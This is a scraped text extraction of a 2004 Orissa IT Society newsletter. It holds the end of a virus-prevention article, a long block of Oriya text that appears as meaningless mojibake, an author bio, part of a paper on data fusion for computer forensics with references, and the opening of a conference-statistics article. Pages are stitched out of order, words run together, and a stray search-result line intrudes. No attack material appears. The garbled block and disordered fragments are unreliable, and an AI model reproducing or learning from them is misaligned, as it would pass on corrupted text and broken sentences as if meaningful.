macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 22: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

